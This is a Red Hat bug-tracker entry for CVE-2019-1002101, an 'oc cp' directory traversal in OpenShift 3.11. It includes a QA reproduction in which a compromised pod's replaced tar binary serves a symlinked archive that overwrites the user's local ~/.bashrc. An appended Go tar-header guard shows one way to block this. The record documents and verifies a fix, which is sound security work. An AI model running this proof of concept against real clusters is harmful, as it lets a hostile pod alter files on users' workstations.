Bug 1693315 - CVE-2019-1002101 - oc/kubectl fix potential directory traversal
Summary: CVE-2019-1002101 - oc/kubectl fix potential directory traversal
Alias: None
Product: OpenShift Container Platform
Classification: Red Hat
Component: Command Line Interface
Version: 3.11.0
Hardware: Unspecified
OS: Unspecified
Target Milestone: ---
: 3.11.z
Assignee: Maciej Szulik
QA Contact: Xingxing Xia
Depends On: 1693313
Blocks: 1693318 1693320
Reported: 2019-03-27 14:18 UTC by Maciej Szulik
Modified: 2019-04-11 10:50 UTC

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Cause: oc cp command was not checking links from tarred files being used to copy files between pod and user's workstation.
Consequence: oc cp command could enable a directory traversal replacing or deleting files on a user’s workstation.
Fix: Do not allow escaping links or any other files from destination directory.
Result: oc cp command verifies files being copied between pods and user workstation not to allow escaping from passed directories.
Clone Of: 1693313
: 1693318
Last Closed:
Target Upstream Version:

Comment 3 Xingxing Xia 2019-04-11 10:50:18 UTC
First, prepare the email's PoC data:
$ oc project kube-service-catalog
$ oc get po
apiserver-j4pzm            1/1     Running   0          2h

$ oc rsh apiserver-j4pzm mkdir /evil
$ oc cp pwn.tar apiserver-j4pzm:/evil # see bug 1693313 attachment
$ oc rsh apiserver-j4pzm
sh-4.2# # compromised pod
sh-4.2# cd /evil
sh-4.2# cat > tarbad << EOF
cat /evil/pwn.tar
sh-4.2# chmod a+x tarbad

sh-4.2# tar -tvf pwn.tar
drwxr-xr-x root/root         0 2019-02-18 14:30 ./baddir/
lrwxrwxrwx root/root         0 2019-02-18 12:45 ./baddir/twist -> /proc/self/cwd
-rw-r--r-- root/root        17 2019-02-18 14:30 ./baddir/twist/.bashrc
sh-4.2# cd /tmp
sh-4.2# tar xvf /evil/pwn.tar
tar: ./baddir/twist/.bashrc: Cannot open: Not a directory
tar: Exiting with failure status due to previous errors
sh-4.2# tar xvf /evil/pwn.tar ./baddir/twist/.bashrc
sh-4.2# mv baddir/twist ./
sh-4.2# mv /bin/tar /bin/tar.bak
sh-4.2# cp /evil/tarbad /bin/tar

Then in your local terminal, reproduce the email PoC with old oc 3.11.92:
$ cd ~/ # Here cd ~/ to demo the PoC
$ /path/to/3.11.92/oc cp apiserver-j4pzm:/tmp/twist twist
$ ls twist
$ bash
$ cat ~/.bashrc
echo "***pwn***" <-- this means your local ~/.bashrc is compromised!

Then verify with fixed oc 3.11.104:
$ cd ~/ # Here cd ~/ to demo the PoC
$ /path/to/3.11.104/oc cp apiserver-j4pzm:/tmp/twist twist
error: tar contents corrupted
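
The rule in the Doc Text ("Do not allow escaping links or any other files from destination directory") can be enforced on tar headers before anything is written to disk. The Go code below is an added example, not the oc/kubectl patch. NewGuard, CheckAll and the destination /home/user/twist are names assumed here, and only entry names and symlinks are covered (hard links and links already on disk are not).

```go
package main

import (
	"archive/tar"
	"fmt"
	"path/filepath"
	"strings"
)

// NewGuard returns a check to run on each header, in archive order, before writing it (dest: absolute, not "/").
func NewGuard(dest string) func(*tar.Header) error {
	dest, links := filepath.Clean(dest), map[string]bool{} // links: symlinks declared so far
	under := func(p string) bool { return p == dest || strings.HasPrefix(p, dest+"/") }
	return func(h *tar.Header) error {
		p := filepath.Join(dest, h.Name)
		if !under(p) {
			return fmt.Errorf("entry %q escapes %s", h.Name, dest)
		}
		for d := p; len(d) > len(dest); d = filepath.Dir(d) {
			if links[d] { // p is, or lies below, a symlink from an earlier entry
				return fmt.Errorf("entry %q passes through symlink %s", h.Name, d)
			}
		}
		if h.Typeflag == tar.TypeSymlink {
			links[p] = true
			if filepath.IsAbs(h.Linkname) || !under(filepath.Join(filepath.Dir(p), h.Linkname)) {
				return fmt.Errorf("symlink %q -> %q leaves %s", h.Name, h.Linkname, dest)
			}
		}
		return nil
	}
}

// CheckAll runs constructed entries ("name" or "name -> target", as `tar -tv` prints them) through a guard.
func CheckAll(dest string, entries ...string) error {
	check := NewGuard(dest)
	for _, e := range entries {
		name, target, isLink := strings.Cut(e, " -> ")
		h := &tar.Header{Name: name, Linkname: target, Typeflag: tar.TypeReg}
		if isLink {
			h.Typeflag = tar.TypeSymlink
		}
		if err := check(h); err != nil {
			return err
		}
	}
	return nil
}

func main() { fmt.Println(CheckAll("/home/user/twist", "./baddir/", "./baddir/twist -> /proc/self/cwd", "./baddir/twist/.bashrc")) }
```

In an extractor, call the returned check on each header from tar.Reader.Next and stop at the first error. The absolute symlink target is refused outright, and the write-through check also refuses an entry whose path is an earlier symlink or lies below one.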
